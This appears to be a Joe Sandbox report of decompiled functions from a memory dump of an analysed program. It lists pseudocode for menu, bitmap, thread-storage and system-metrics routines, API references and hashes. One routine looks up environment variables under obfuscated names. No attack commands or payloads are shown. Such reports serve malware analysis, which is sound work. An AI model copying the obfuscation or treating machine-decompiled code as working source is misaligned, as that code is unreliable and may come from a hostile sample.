0x00d0c157
0x00d0c159
0x00d0c15e
0x00d0c162
0x00d0c162
0x00d0c16f
0x00d0c173
0x00d0c17f
0x00d0c182
0x00d0c187
0x00d0c18b
0x00d0c18c
0x00d0c18d
0x00d0c19a
0x00d0c19d
0x00d0c1a5
0x00d0c1a6
0x00d0c1ae
0x00d0c1b2
0x00d0c1b8
0x00d0c1bc
0x00d0c1c2
0x00d0c1fc
0x00d0c201
0x00d0c203
0x00d0c207
0x00d0c20f
0x00000000
0x00000000
0x00d0c211
0x00d0c215
0x00000000
0x00000000
0x00d0c217
0x00000000
0x00d0c215
0x00d0c222
0x00d0c222
0x00d0c1c4
0x00d0c1c5
0x00d0c1cb
0x00d0c1cd
0x00d0c1d2
0x00d0c1d4
0x00d0c1d6
0x00d0c1df
0x00000000
0x00000000
0x00d0c1e1
0x00d0c1e5
0x00000000
0x00000000
0x00d0c1e7
0x00000000
0x00d0c1e5
0x00d0c1f0
0x00d0c1f6
0x00d0c1f6
0x00d0c1d2
0x00d0c1c2
0x00d0c228
0x00d0c228
0x00d0c228
0x00d0c22c
0x00d0c231

APIs

__EH_prolog3.LIBCMT ref: 00D0C13D

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

__CxxThrowException@8.LIBCMT ref: 00D0C182
GetMenuItemCount.USER32(?), ref: 00D0C191
GetMenuItemCount.USER32(8007000E), ref: 00D0C19D
GetSubMenu.USER32(8007000E,-00000001), ref: 00D0C1B2
GetMenuItemCount.USER32(00000000), ref: 00D0C1C5
GetSubMenu.USER32(00000000,00000000), ref: 00D0C1D6
RemoveMenu.USER32(00000000,00000000,00000400,?,?,?,?,?,8007000E,00EE9FD4,00000004,00CA5A8C,8007000E,?,00CA36CE,80004005), ref: 00D0C1F0

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Menu$CountItem$Exception@8H_prolog3RemoveThrow_malloc
String ID:
API String ID: 638606686-0
Opcode ID: 28cf980f42dca72f9aef51465737a6cac7f684981601a1cdc41dc7bb5ee167f5
Instruction ID: 6e228a97827a558f3ca1d6a50b2b5723c0f22fc9cf6f121b7e78acb7a28aa5cb
Opcode Fuzzy Hash: 28cf980f42dca72f9aef51465737a6cac7f684981601a1cdc41dc7bb5ee167f5
Instruction Fuzzy Hash: E831BF31510314FBDB11AFA1DC09B9E7BF4EB40711F245219F91DA62A1C7709A40DBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D38061 Relevance: 13.7, APIs: 9, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00D38061() {
				signed int _t87;
				void* _t89;
				void* _t93;
				int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				long _t100;
				void* _t106;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				int _t114;
				int _t115;
				signed int _t116;
				int _t120;
				int _t122;
				void* _t123;
				signed int _t124;
				void* _t125;
				void* _t126;
				int _t127;
				signed int _t129;
				int _t131;
				signed int _t134;
				int _t135;
				void** _t136;
				int _t138;
				int _t140;
				int _t142;
				void* _t143;
				signed int _t144;
				void* _t145;

				0xe21503(0xa8);
				_t136 =  *(_t145 + 8);
				_t112 =  *(_t145 + 0xc);
				 *(_t145 - 0x80) = _t112;
				if( *_t136 != 0) {
					if(GetObjectW( *_t136, 0x18, _t145 - 0xb4) != 0) {
						_t116 =  *(_t145 - 0xb0);
						 *(_t145 - 0x6c) =  *(_t145 - 0xac);
						_t87 = _t116;
						asm("cdq");
						_t124 = _t87 % _t112;
						_t113 = _t87 / _t112;
						 *(_t145 - 0x84) = _t116;
						_t89 = 0x20;
						 *(_t145 - 0x7c) = _t113;
						if( *((intOrPtr*)(_t145 - 0xa2)) != _t89) {
							E00D19EF3(_t145 - 0x9c);
							_t131 = 0;
							 *(_t145 - 4) = 0;
							E00D1A8A4(_t113, _t145 - 0x9c, _t124,  *0xe8e168(0));
							if( *_t136 == 0) {
								_t93 = 0;
								 *(_t145 - 0x78) = 0;
							} else {
								_t93 = SelectObject( *(_t145 - 0x98),  *_t136);
								 *(_t145 - 0x78) = _t93;
							}
							if(_t93 != 0) {
								if(_t113 > 0) {
									_t97 =  *(_t145 - 0x80);
									_t120 = _t131;
									_t125 =  *(_t145 - 0x6c);
									 *(_t145 - 0x74) = _t120;
									do {
										 *(_t145 - 0x8c) = _t131;
										if(_t125 > 0) {
											_t55 = _t120 - 1; // -1
											_t138 = _t55 + _t97;
											asm("cdq");
											_t98 = _t97 - _t125;
											 *(_t145 - 0x88) = _t138;
											_t125 =  *(_t145 - 0x6c);
											_t99 = _t98 >> 1;
											 *(_t145 - 0x84) = _t99;
											do {
												 *(_t145 - 0x68) = _t138;
												_t114 = _t120;
												if(_t99 > 0) {
													 *(_t145 - 0x70) = _t99;
													do {
														_t100 = GetPixel( *(_t145 - 0x98), _t114, _t131);
														SetPixel( *(_t145 - 0x98), _t114, _t131, GetPixel( *(_t145 - 0x98),  *(_t145 - 0x68), _t131));
														_t140 =  *(_t145 - 0x68);
														SetPixel( *(_t145 - 0x98), _t140, _t131, _t100);
														_t114 = _t114 + 1;
														_t67 = _t145 - 0x70;
														 *_t67 =  *(_t145 - 0x70) - 1;
														 *(_t145 - 0x68) = _t140 - 1;
													} while ( *_t67 != 0);
													_t120 =  *(_t145 - 0x74);
													_t99 =  *(_t145 - 0x84);
													_t125 =  *(_t145 - 0x6c);
													_t138 =  *(_t145 - 0x88);
												}
												_t131 = _t131 + 1;
											} while (_t131 < _t125);
											_t113 =  *(_t145 - 0x7c);
											_t131 = 0;
											_t97 =  *(_t145 - 0x80);
										}
										_t120 = _t120 + _t97;
										_t113 = _t113 - 1;
										 *(_t145 - 0x74) = _t120;
										 *(_t145 - 0x7c) = _t113;
									} while (_t113 != 0);
									_t93 =  *(_t145 - 0x78);
								}
								SelectObject( *(_t145 - 0x98), _t93);
								_t131 = 1;
							}
							 *(_t145 - 4) =  *(_t145 - 4) | 0xffffffff;
							E00D1A049(_t145 - 0x9c);
							_t95 = _t131;
						} else {
							if(GetObjectW( *_t136, 0x54, _t145 - 0x64) == 0) {
								goto L3;
							} else {
								_t106 = 0x20;
								if( *((intOrPtr*)(_t145 - 0x52)) != _t106) {
									goto L3;
								} else {
									_t142 =  *(_t145 - 0x50);
									 *(_t145 - 0x74) = _t142;
									if(_t142 == 0) {
										goto L3;
									} else {
										if(_t113 > 0) {
											_t108 =  *(_t145 - 0x80);
											_t126 =  *(_t145 - 0x6c);
											_t134 = _t108 << 2;
											_t122 = _t142 - 4 + _t134;
											 *(_t145 - 0x8c) = _t134;
											 *(_t145 - 0x70) = _t122;
											do {
												if(_t126 > 0) {
													asm("cdq");
													_t115 = _t142;
													_t143 =  *(_t145 - 0x6c);
													_t110 = _t108 - _t126 >> 1;
													 *(_t145 - 0x88) = _t110;
													 *(_t145 - 0x68) = _t122;
													 *(_t145 - 0x78) = _t143;
													do {
														_t127 = _t115;
														_t135 = _t122;
														if(_t110 > 0) {
															_t144 = _t110;
															do {
																_t123 =  *_t127;
																 *_t127 =  *_t135;
																_t127 = _t127 + 4;
																 *_t135 = _t123;
																_t135 = _t135 - 4;
																_t144 = _t144 - 1;
															} while (_t144 != 0);
															_t110 =  *(_t145 - 0x88);
															_t122 =  *(_t145 - 0x68);
															_t143 =  *(_t145 - 0x78);
														}
														_t129 =  *(_t145 - 0x84) << 2;
														_t122 = _t122 + _t129;
														_t115 = _t115 + _t129;
														_t143 = _t143 - 1;
														 *(_t145 - 0x68) = _t122;
														 *(_t145 - 0x78) = _t143;
													} while (_t143 != 0);
													_t142 =  *(_t145 - 0x74);
													_t113 =  *(_t145 - 0x7c);
													_t134 =  *(_t145 - 0x8c);
													_t108 =  *(_t145 - 0x80);
													_t122 =  *(_t145 - 0x70);
													_t126 =  *(_t145 - 0x6c);
												}
												_t142 = _t142 + _t134;
												_t122 = _t122 + _t134;
												_t113 = _t113 - 1;
												 *(_t145 - 0x74) = _t142;
												 *(_t145 - 0x70) = _t122;
												 *(_t145 - 0x7c) = _t113;
											} while (_t113 != 0);
										}
										goto L1;
										L39:
									}
								}
							}
						}
					} else {
						L3:
						_t95 = 0;
					}
				} else {
					L1:
					_t95 = 1;
				}
				0xe214b2();
				return _t95;
				goto L39;
			}

0x00d3806b
0x00d38070
0x00d38073
0x00d38076
0x00d3807c
0x00d3809b
0x00d380aa
0x00d380b0
0x00d380b3
0x00d380b5
0x00d380b6
0x00d380ba
0x00d380bc
0x00d380c2
0x00d380c3
0x00d380cd
0x00d38198
0x00d3819d
0x00d381a0
0x00d381b0
0x00d381b7
0x00d381cc
0x00d381ce
0x00d381b9
0x00d381c1
0x00d381c7
0x00d381c7
0x00d381d3
0x00d381db
0x00d381e1
0x00d381e4
0x00d381e6
0x00d381e9
0x00d381ec
0x00d381ec
0x00d381f4
0x00d381fa
0x00d381fd
0x00d381ff
0x00d38200
0x00d38202
0x00d38208
0x00d3820b
0x00d3820d
0x00d38213
0x00d38213
0x00d38216
0x00d3821a
0x00d3821c
0x00d3821f
0x00d38227
0x00d38248
0x00d3824f
0x00d3825a
0x00d38260
0x00d38262
0x00d38262
0x00d38265
0x00d38265
0x00d3826a
0x00d3826d
0x00d38273
0x00d38276
0x00d38276
0x00d3827c
0x00d3827d
0x00d38281
0x00d38284
0x00d38286
0x00d38286
0x00d38289
0x00d3828b
0x00d3828c
0x00d3828f
0x00d3828f
0x00d38298
0x00d38298
0x00d382a2
0x00d382aa
0x00d382aa
0x00d382ab
0x00d382b5
0x00d382ba
0x00d380d3
0x00d380df
0x00000000
0x00d380e1
0x00d380e3
0x00d380e8
0x00000000
0x00d380ea
0x00d380ea
0x00d380ed
0x00d380f2
0x00000000
0x00d380f4
0x00d380f6
0x00d380f8
0x00d380fe
0x00d38103
0x00d38106
0x00d38108
0x00d3810e
0x00d38111
0x00d38113
0x00d38115
0x00d38116
0x00d38118
0x00d3811d
0x00d3811f
0x00d38125
0x00d38128
0x00d3812b
0x00d3812b
0x00d3812d
0x00d38131
0x00d38133
0x00d38135
0x00d38135
0x00d38139
0x00d3813b
0x00d3813e
0x00d38140
0x00d38143
0x00d38143
0x00d38146
0x00d3814c
0x00d3814f
0x00d3814f
0x00d38158
0x00d3815b
0x00d3815d
0x00d3815f
0x00d38160
0x00d38163
0x00d38163
0x00d38168
0x00d3816b
0x00d3816e
0x00d38174
0x00d38177
0x00d3817a
0x00d3817a
0x00d3817d
0x00d3817f
0x00d38181
0x00d38182
0x00d38185
0x00d38188
0x00d38188
0x00d3818d
0x00000000
0x00000000
0x00d380f6
0x00d380f2
0x00d380e8
0x00d380df
0x00d3809d
0x00d3809d
0x00d3809d
0x00d3809d
0x00d3807e
0x00d3807e
0x00d38080
0x00d38080
0x00d382bc
0x00d382c1
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 00D3806B
GetObjectW.GDI32(?,00000018,?,000000A8,00D38652,?,00000010,00000038,00D375CE), ref: 00D38097

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3_Object
String ID:
API String ID: 2214263146-0
Opcode ID: 410fbd72a643b46b8e413cf1eb771177c78c869adf0df5f7764704a7e7684308
Instruction ID: 163e7e74c7cdf0a295b6e298cb85cb3bfc67dc6e77fcf6d3f7c88dc9ff4e0741
Opcode Fuzzy Hash: 410fbd72a643b46b8e413cf1eb771177c78c869adf0df5f7764704a7e7684308
Instruction Fuzzy Hash: F1811775E003298FDB24CFA9CC80A9EBBB5FF58300F248169E959A7311DA709D85DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D42E Relevance: 13.6, APIs: 9, Instructions: 101
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00D0D42E(long* __ecx) {
				void* _t38;
				long* _t41;
				long _t42;
				void* _t43;
				long _t53;
				signed int _t54;
				int _t55;
				void* _t59;
				signed int _t60;
				void* _t61;
				void* _t63;
				long* _t64;
				void* _t65;
				void* _t66;
				long* _t67;
				void* _t68;

				_t56 = __ecx;
				0xe21539(0x10);
				_t67 = __ecx;
				 *(_t68 - 0x18) = __ecx;
				_t64 =  &(__ecx[7]);
				 *(_t68 - 0x14) = _t64;
				 *0xe8e4d8(_t64);
				_t54 =  *(_t68 + 8);
				if(_t54 <= 0 || _t54 >= __ecx[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *__ecx);
					if(_t65 == 0) {
						_t55 = 0;
						 *(_t68 - 4) = 0;
						_t66 = E00D0D0A9(0x10);
						if(_t66 == 0) {
							_t66 = 0;
						} else {
							 *_t66 = 0xe9e5e0;
						}
						 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
						 *(_t66 + 8) = _t55;
						 *(_t66 + 0xc) = _t55;
						_t41 = E00D0D35E( &(_t67[5]), _t66);
						_t56 = _t67[5];
						 *_t41 = _t67[5];
						_t67[5] = _t66;
						_t67 =  *(_t68 - 0x18);
						goto L10;
					} else {
						if(_t54 >=  *((intOrPtr*)(_t65 + 8)) &&  *((intOrPtr*)(_t68 + 0xc)) != 0) {
							_t55 = 0;
							L10:
							if( *(_t66 + 0xc) != _t55) {
								_t42 = E00D0C969(_t55, _t56, _t66, _t67, _t67[3], 4);
								_t59 = 2;
								_t43 = LocalReAlloc( *(_t66 + 0xc), _t42, ??);
							} else {
								_t53 = E00D0C969(_t55, _t56, _t66, _t67, _t67[3], 4);
								_pop(_t59);
								_t43 = LocalAlloc(_t55, _t53);
							}
							_t63 = _t43;
							if(_t63 == 0) {
								 *0xe8e4d4( *(_t68 - 0x14));
								E00D0BD23(_t59);
							}
							_t60 =  *(_t66 + 8);
							 *(_t66 + 0xc) = _t63;
							0xe23f30(_t63 + _t60 * 4, _t55, _t67[3] - _t60 << 2);
							 *(_t66 + 8) = _t67[3];
							TlsSetValue( *_t67, _t66);
							_t54 =  *(_t68 + 8);
						}
					}
					_t61 =  *(_t66 + 0xc);
					if(_t61 != 0 && _t54 <  *(_t66 + 8)) {
						 *((intOrPtr*)(_t61 + _t54 * 4)) =  *((intOrPtr*)(_t68 + 0xc));
					}
					_push( *(_t68 - 0x14));
				}
				_t38 =  *0xe8e4d4();
				0xe2149e();
				return _t38;
			}

0x00d0d42e
0x00d0d435
0x00d0d43a
0x00d0d43c
0x00d0d43f
0x00d0d443
0x00d0d446
0x00d0d44c
0x00d0d451
0x00d0d561
0x00d0d460
0x00d0d468
0x00d0d46c
0x00d0d485
0x00d0d489
0x00d0d491
0x00d0d495
0x00d0d49f
0x00d0d497
0x00d0d497
0x00d0d497
0x00d0d4a1
0x00d0d4a9
0x00d0d4ac
0x00d0d4af
0x00d0d4b4
0x00d0d4b7
0x00d0d4b9
0x00d0d4bc
0x00000000
0x00d0d46e
0x00d0d471
0x00d0d481
0x00d0d4bf
0x00d0d4c2
0x00d0d4e1
0x00d0d4e7
0x00d0d4ec
0x00d0d4c4
0x00d0d4c9
0x00d0d4cf
0x00d0d4d2
0x00d0d4d2
0x00d0d4f2
0x00d0d4f6
0x00d0d4fb
0x00d0d501
0x00d0d501
0x00d0d506
0x00d0d509
0x00d0d51a
0x00d0d525
0x00d0d52b
0x00d0d531
0x00d0d531
0x00d0d471
0x00d0d534
0x00d0d539
0x00d0d543
0x00d0d543
0x00d0d546
0x00d0d546
0x00d0d562
0x00d0d568
0x00d0d56d

APIs

__EH_prolog3_catch.LIBCMT ref: 00D0D435
RtlEnterCriticalSection.NTDLL(?), ref: 00D0D446
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?,?,?,00CA5C95,?,?,00CA36FB), ref: 00D0D462
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?), ref: 00D0D4D2
LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?), ref: 00D0D4EC
RtlLeaveCriticalSection.NTDLL(?), ref: 00D0D4FB
_memset.LIBCMT ref: 00D0D51A
TlsSetValue.KERNEL32(?,00000000), ref: 00D0D52B
RtlLeaveCriticalSection.NTDLL(?), ref: 00D0D562

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$AllocLeaveLocalValue$EnterH_prolog3_catch_memset
String ID:
API String ID: 4057217241-0
Opcode ID: adece7441fc1106a35ac00e81eecebc005d78a95c2fcc853c512c8d0a45ce5ae
Instruction ID: d7a090c7ff6bc32a78b1bc7387e59d9c63912a265a425404ae32db285fa2c0d5
Opcode Fuzzy Hash: adece7441fc1106a35ac00e81eecebc005d78a95c2fcc853c512c8d0a45ce5ae
Instruction Fuzzy Hash: AF319F70500705EFD7259F95E885A2AFBB6FF40314B20852EE95EA76A0DB31E914CF70

Uniqueness

Uniqueness Score: -1.00%

Function 00CA78EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00CA78EE(void* __ecx, void* __eflags) {
				void* _t27;
				intOrPtr _t37;
				signed int _t46;
				intOrPtr _t47;
				signed int _t48;
				intOrPtr _t62;
				void* _t64;
				void* _t65;
				void* _t66;

				0xe21503(0x17c);
				_t47 =  *((intOrPtr*)(_t64 + 8));
				_t62 =  *((intOrPtr*)(_t64 + 0xc));
				_t27 = E00D095A9(__ecx, L"IIDIEK[\\IO[Q");
				0xe24b10(_t27, 0);
				_t66 = _t65 + 0xc;
				if(_t27 != 0) {
					L3:
					E00CA3D46(_t64 - 0x28, _t27);
					 *(_t64 - 4) =  *(_t64 - 4) & 0x00000000;
					_push(0);
					E00CA7590(_t64 - 0x28, __eflags, _t29, E00CA9A45(E00D095A9(_t64 - 0x28, 0xe93b40)));
					E00CA7590(_t64 - 0x28, __eflags, _t47, E00CA9A45(_t47));
					_push(1);
					_push(0x40);
					_push(0x21);
					_push(_t64 - 0x28);
					E00CA3949(_t64 - 0xe0);
					 *(_t64 - 4) = 1;
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t64 - 0xe0)) + 4));
					__eflags =  *(_t64 + _t37 - 0xd4) & 0x00000006;
					if(( *(_t64 + _t37 - 0xd4) & 0x00000006) == 0) {
						_push(1);
						_push(0x40);
						_push(0x22);
						_push(_t62);
						E00CA3B57(_t64 - 0x188);
						 *(_t64 - 4) = 2;
						_push(_t64 - 0xd0);
						E00CA5071(_t64 - 0x188, __eflags);
						E00CA789A(_t64 - 0x188, __eflags);
						E00CA7868(_t64 - 0xe0, __eflags);
						_t48 = 1;
						E00CA52B1(_t64 - 0x188);
					} else {
						_t48 = 0;
					}
					E00CA5225(_t64 - 0xe0);
					E00CA71CD(_t64 - 0x28, 1, 0);
					_t46 = _t48;
				} else {
					_t27 = E00D095A9(__ecx, L"DVWLH^J");
					0xe24b10(_t27, _t27);
					_t66 = _t66 + 0xc;
					if(_t27 != 0) {
						goto L3;
					} else {
						_t46 = 0;
					}
				}
				0xe214b2();
				return _t46;
			}

0x00ca78f8
0x00ca78fd
0x00ca7900
0x00ca790a
0x00ca7910
0x00ca7915
0x00ca791a
0x00ca793b
0x00ca793f
0x00ca7944
0x00ca7948
0x00ca7964
0x00ca7975
0x00ca797a
0x00ca797c
0x00ca797e
0x00ca7983
0x00ca798a
0x00ca7995
0x00ca7999
0x00ca799c
0x00ca79a4
0x00ca79aa
0x00ca79ac
0x00ca79ae
0x00ca79b0
0x00ca79b7
0x00ca79c2
0x00ca79c6
0x00ca79cd
0x00ca79d8
0x00ca79e3
0x00ca79ee
0x00ca79f0
0x00ca79a6
0x00ca79a6
0x00ca79a6
0x00ca79fb
0x00ca7a07
0x00ca7a0c
0x00ca791c
0x00ca7922
0x00ca7928
0x00ca792d
0x00ca7932
0x00000000
0x00ca7934
0x00ca7934
0x00ca7934
0x00ca7932
0x00ca7a0e
0x00ca7a13

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA78F8
__wgetenv.LIBCMT ref: 00CA7910
__wgetenv.LIBCMT ref: 00CA7928

Part of subcall function 00E24B10: _wcsnlen.LIBCMT ref: 00E24B49
Part of subcall function 00E24B10: __lock.LIBCMT ref: 00E24B5A
Part of subcall function 00E24B10: __wgetenv_helper_nolock.LIBCMT ref: 00E24B65

char_traits.LIBCPMT ref: 00CA7957
char_traits.LIBCPMT ref: 00CA796A

Strings

DVWLH^J, xrefs: 00CA791D
IIDIEK[\IO[Q, xrefs: 00CA7905

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: __wgetenvchar_traits$H_prolog3___lock__wgetenv_helper_nolock_wcsnlen
String ID: DVWLH^J$IIDIEK[\IO[Q
API String ID: 4033293098-1430980991
Opcode ID: c4cf1551daa67a665a0f8b8f435ec399c7fac51120925f6002b05003ec314986
Instruction ID: 515f03e74159e3b56a9ec7c14907294fe926362d0c5243e9b1b3771b13cb71f2
Opcode Fuzzy Hash: c4cf1551daa67a665a0f8b8f435ec399c7fac51120925f6002b05003ec314986
Instruction Fuzzy Hash: EC31D271A44205AADB10F7A0DC67FEE7368AF16704F045594F509761C2EEB0AF84DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E64EDF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

FindCompleteObject.LIBCMT ref: 00E64F00
FindMITargetTypeInstance.LIBCMT ref: 00E64F39

Part of subcall function 00E64B9F: PMDtoOffset.LIBCMT ref: 00E64C31

FindVITargetTypeInstance.LIBCMT ref: 00E64F40
PMDtoOffset.LIBCMT ref: 00E64F51
std::bad_exception::bad_exception.LIBCMT ref: 00E64F7A
__CxxThrowException@8.LIBCMT ref: 00E64F88

Strings

Bad dynamic_cast!, xrefs: 00E64F72

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Find$InstanceOffsetTargetType$CompleteException@8ObjectThrowstd::bad_exception::bad_exception
String ID: Bad dynamic_cast!
API String ID: 1565299582-2956939130
Opcode ID: 17a9e4918a0bfaef4f00cf167ddb9389de1a69ea782a0ab2c19f756f33861529
Instruction ID: 8e040ce2f7c876b7d84453331ad29313e407b64d6d1fa9e6965b3524ec74e06d
Opcode Fuzzy Hash: 17a9e4918a0bfaef4f00cf167ddb9389de1a69ea782a0ab2c19f756f33861529
Instruction Fuzzy Hash: 242105B2A802189FCB10DFA8E842AAE77B9AF59750F143008F505B72C2CA31D901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00D33114 Relevance: 12.1, APIs: 8, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D33114(void* __ecx) {
				int _t16;
				void _t20;
				int _t27;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t28 = __ecx;
				 *((intOrPtr*)(__ecx + 0xc)) = 1;
				 *((intOrPtr*)(_t28 + 0x114)) = GetSystemMetrics(0x31);
				_t16 = GetSystemMetrics(0x32);
				_t30 = _t28 + 0x16c;
				 *(_t28 + 0x118) = _t16;
				SetRectEmpty(_t30);
				if(EnumDisplayMonitors(0, 0, 0xd32faa, _t30) == 0) {
					SystemParametersInfoW(0x30, 0, _t30, 0);
				}
				_t27 = 0;
				_t31 = _t28 + 0x190;
				 *0xf0d540 = 0;
				 *_t31 = 0;
				 *(_t28 + 0x194) = 0;
				if( *((intOrPtr*)(_t28 + 0x180)) == 0) {
					SystemParametersInfoW(0x1002, 0, _t31, 0);
					_t27 = 0;
					if( *_t31 != 0) {
						SystemParametersInfoW(0x1012, 0, _t28 + 0x194, 0);
						_t27 = 0;
					}
				}
				_t32 = _t28 + 0x1a4;
				 *(_t28 + 0x1c8) = _t27;
				 *((intOrPtr*)(_t28 + 0x1a8)) = 1;
				SystemParametersInfoW(0x100a, _t27, _t32, _t27);
				_t20 =  *_t32;
				 *(_t28 + 0xc) =  *(_t28 + 0xc) & 0x00000000;
				 *(_t28 + 0x1a0) = _t20;
				return _t20;
			}

0x00d3311d
0x00d33121
0x00d3312c
0x00d33132
0x00d33134
0x00d3313a
0x00d33141
0x00d3315f
0x00d33168
0x00d33168
0x00d3316a
0x00d3316c
0x00d33172
0x00d33178
0x00d3317a
0x00d33186
0x00d33190
0x00d33192
0x00d33196
0x00d331a6
0x00d331a8
0x00d331a8
0x00d33196
0x00d331ab
0x00d331b1
0x00d331be
0x00d331c8
0x00d331ca
0x00d331cc
0x00d331d0
0x00d331d9

APIs

GetSystemMetrics.USER32(00000031), ref: 00D33128
GetSystemMetrics.USER32(00000032), ref: 00D33132
SetRectEmpty.USER32(?), ref: 00D33141
EnumDisplayMonitors.USER32(00000000,00000000,00D32FAA,?,?,770E9FF0,00000001,00D330D5), ref: 00D33151
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D33168
SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 00D33190
SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 00D331A6
SystemParametersInfoW.USER32 ref: 00D331C8

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
